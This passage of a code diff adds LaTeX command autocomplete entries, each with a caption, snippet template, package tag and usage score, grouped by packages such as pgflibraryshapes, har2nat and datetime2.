snippet: '\\expandafter{$1}', + meta: 'tkz-euclide-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tkz-euclide-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-euclide-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tkz-euclide-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-euclide-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tkz-euclide-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tkz-euclide-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tkz-euclide-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tkz-euclide-cmd', + score: 0.2864294797053033, + }, + ], + morewrites: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'morewrites-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'morewrites-cmd', + score: 0.2864294797053033, + }, + ], + pgflibraryshapes: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgflibraryshapes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgflibraryshapes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgflibraryshapes-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgflibraryshapes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryshapes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgflibraryshapes-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryshapes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgflibraryshapes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgflibraryshapes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgflibraryshapes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgflibraryshapes-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgflibraryshapes-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgflibraryshapes-cmd', + score: 0.2864294797053033, + }, + ], + pdfcolparallel: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pdfcolparallel-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'pdfcolparallel-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'pdfcolparallel-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdfcolparallel-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pdfcolparallel-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\ParallelRText{}', + snippet: '\\ParallelRText{$1}', + meta: 'pdfcolparallel-cmd', + score: 0.0005986518360651812, + }, + { + caption: '\\ParallelLText{}', + snippet: '\\ParallelLText{$1}', + meta: 'pdfcolparallel-cmd', + score: 0.0005986518360651812, + }, + { + caption: '\\ParallelPar', + snippet: '\\ParallelPar', + meta: 'pdfcolparallel-cmd', + score: 0.0005986518360651812, + }, + ], + aeguill: [ + { + caption: '\\guillemotleft', + snippet: '\\guillemotleft', + meta: 'aeguill-cmd', + score: 9.764370963946686e-5, + }, + { + caption: '\\guillemotright', + snippet: '\\guillemotright', + meta: 'aeguill-cmd', + score: 9.764370963946686e-5, + }, + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'aeguill-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'aeguill-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aeguill-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'aeguill-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'aeguill-cmd', + score: 0.021170869458413965, + }, + ], + changes: [ + { + caption: '\\selectfont', + snippet: '\\selectfont', + meta: 'changes-cmd', + score: 0.04598628699063736, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'changes-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'changes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'changes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'changes-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'changes-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'changes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'changes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'changes-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'changes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'changes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'changes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'changes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'changes-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'changes-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'changes-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'changes-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'changes-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'changes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'changes-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'changes-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'changes-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'changes-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'changes-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'changes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'changes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'changes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'changes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'changes-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'changes-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'changes-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'changes-cmd', + score: 0.2864294797053033, + }, + ], + droidmono: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'droidmono-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'droidmono-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'droidmono-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'droidmono-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'droidmono-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'droidmono-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\scshape', + snippet: '\\scshape', + meta: 'droidmono-cmd', + score: 0.05364108855914402, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'droidmono-cmd', + score: 0.00037306820619479756, + }, + ], + tgheros: [ + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'tgheros-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'tgheros-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgheros-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgheros-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgheros-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgheros-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgheros-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgheros-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgheros-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgheros-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgheros-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgheros-cmd', + score: 0.021170869458413965, + }, + ], + har2nat: [ + { + caption: '\\citeasnoun{}', + snippet: '\\citeasnoun{$1}', + meta: 'har2nat-cmd', + score: 0.010452591644582749, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'har2nat-cmd', + score: 2.341195220791228, + }, + { + caption: '\\citealt{}', + snippet: '\\citealt{$1}', + meta: 'har2nat-cmd', + score: 0.007302105441724955, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'har2nat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'har2nat-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\textsuperscript{}', + snippet: '\\textsuperscript{$1}', + meta: 'har2nat-cmd', + score: 0.05216393882408519, + }, + { + caption: '\\nocite{}', + snippet: '\\nocite{$1}', + meta: 'har2nat-cmd', + score: 0.04990693820960752, + }, + { + caption: '\\bibname', + snippet: '\\bibname', + meta: 'har2nat-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\bibname{}', + snippet: '\\bibname{$1}', + meta: 'har2nat-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\bibpunct', + snippet: '\\bibpunct', + meta: 'har2nat-cmd', + score: 0.001148574749873469, + }, + { + caption: '\\bibpunct{}{}{}{}{}{}', + snippet: '\\bibpunct{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'har2nat-cmd', + score: 0.001148574749873469, + }, + { + caption: '\\bibpunct[]{}{}{}{}{}{}', + snippet: '\\bibpunct[$1]{$2}{$3}{$4}{$5}{$6}{$7}', + meta: 'har2nat-cmd', + score: 0.001148574749873469, + }, + { + caption: '\\citepalias{}', + snippet: '\\citepalias{$1}', + meta: 'har2nat-cmd', + score: 0.00032712684909035603, + }, + { + caption: '\\citepalias[][]{}', + snippet: '\\citepalias[$1][$2]{$3}', + meta: 'har2nat-cmd', + score: 0.00032712684909035603, + }, + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'har2nat-cmd', + score: 0.010304996748556729, + }, + { + caption: '\\citep{}', + snippet: '\\citep{$1}', + meta: 'har2nat-cmd', + score: 0.2941882834697057, + }, + { + caption: '\\bibsection', + snippet: '\\bibsection', + meta: 'har2nat-cmd', + score: 0.00038872734530908233, + }, + { + caption: '\\bibsection{}', + snippet: '\\bibsection{$1}', + meta: 'har2nat-cmd', + score: 0.00038872734530908233, + }, + { + caption: '\\refname', + snippet: '\\refname', + meta: 'har2nat-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\refname{}', + snippet: '\\refname{$1}', + meta: 'har2nat-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\citealp{}', + snippet: '\\citealp{$1}', + meta: 'har2nat-cmd', + score: 0.005275912376595364, + }, + { + caption: '\\citealp[]{}', + snippet: '\\citealp[$1]{$2}', + meta: 'har2nat-cmd', + score: 0.005275912376595364, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'har2nat-cmd', + score: 2.341195220791228, + }, + { + caption: '\\citetalias{}', + snippet: '\\citetalias{$1}', + meta: 'har2nat-cmd', + score: 0.001419571355756266, + }, + { + caption: '\\bibitem{}', + snippet: '\\bibitem{$1}', + meta: 'har2nat-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\bibitem[]{}', + snippet: '\\bibitem[$1]{$2}', + meta: 'har2nat-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\citet{}', + snippet: '\\citet{$1}', + meta: 'har2nat-cmd', + score: 0.09046048561361801, + }, + { + caption: '\\defcitealias{}{}', + snippet: '\\defcitealias{$1}{$2}', + meta: 'har2nat-cmd', + score: 0.00042021825647418025, + }, + { + caption: '\\aftergroup', + snippet: '\\aftergroup', + meta: 'har2nat-cmd', + score: 0.002020423627422133, + }, + { + caption: '\\setcitestyle{}', + snippet: '\\setcitestyle{$1}', + meta: 'har2nat-cmd', + score: 0.0015840652870152204, + }, + { + caption: '\\citeyearpar{}', + snippet: '\\citeyearpar{$1}', + meta: 'har2nat-cmd', + score: 0.001877888310324327, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'har2nat-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'har2nat-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\newblock', + snippet: '\\newblock', + meta: 'har2nat-cmd', + score: 0.03684301726876973, + }, + { + caption: '\\newblock{}', + snippet: '\\newblock{$1}', + meta: 'har2nat-cmd', + score: 0.03684301726876973, + }, + { + caption: '\\bibnumfmt', + snippet: '\\bibnumfmt', + meta: 'har2nat-cmd', + score: 0.000353353600267394, + }, + { + caption: '\\citeyear{}', + snippet: '\\citeyear{$1}', + meta: 'har2nat-cmd', + score: 0.01091041305836494, + }, + { + caption: '\\citeauthor{}', + snippet: '\\citeauthor{$1}', + meta: 'har2nat-cmd', + score: 0.01359248786373484, + }, + { + caption: '\\let', + snippet: '\\let', + meta: 'har2nat-cmd', + score: 0.03789745970461662, + }, + ], + 'matlab-prettifier': [ + { + caption: '\\mlttfamily', + snippet: '\\mlttfamily', + meta: 'matlab-prettifier-cmd', + score: 0.000856282742498241, + }, + { + caption: '\\vskip', + snippet: '\\vskip', + meta: 'matlab-prettifier-cmd', + score: 0.05143052892347224, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'matlab-prettifier-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'matlab-prettifier-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\thelstlisting', + snippet: '\\thelstlisting', + meta: 'matlab-prettifier-cmd', + score: 0.00012774128088872144, + }, + { + caption: '\\lstinputlisting[]{}', + snippet: '\\lstinputlisting[$1]{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\lstinputlisting{}', + snippet: '\\lstinputlisting{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'matlab-prettifier-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'matlab-prettifier-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\lstinline', + snippet: '\\lstinline', + meta: 'matlab-prettifier-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstinline{}', + snippet: '\\lstinline{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstlistoflistings', + snippet: '\\lstlistoflistings', + meta: 'matlab-prettifier-cmd', + score: 0.005279080363360602, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'matlab-prettifier-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'matlab-prettifier-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'matlab-prettifier-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'matlab-prettifier-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'matlab-prettifier-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'matlab-prettifier-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'matlab-prettifier-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'matlab-prettifier-cmd', + score: 0.2864294797053033, + }, + ], + datetime2: [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'datetime2-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'datetime2-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'datetime2-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'datetime2-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'datetime2-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'datetime2-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'datetime2-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'datetime2-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'datetime2-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'datetime2-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'datetime2-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'datetime2-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'datetime2-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'datetime2-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'datetime2-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'datetime2-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'datetime2-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'datetime2-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'datetime2-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'datetime2-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'datetime2-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'datetime2-cmd', + score: 0.008565354665444157, + }, + ], + lapdf: [ + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'lapdf-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'lapdf-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'lapdf-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'lapdf-cmd', + score: 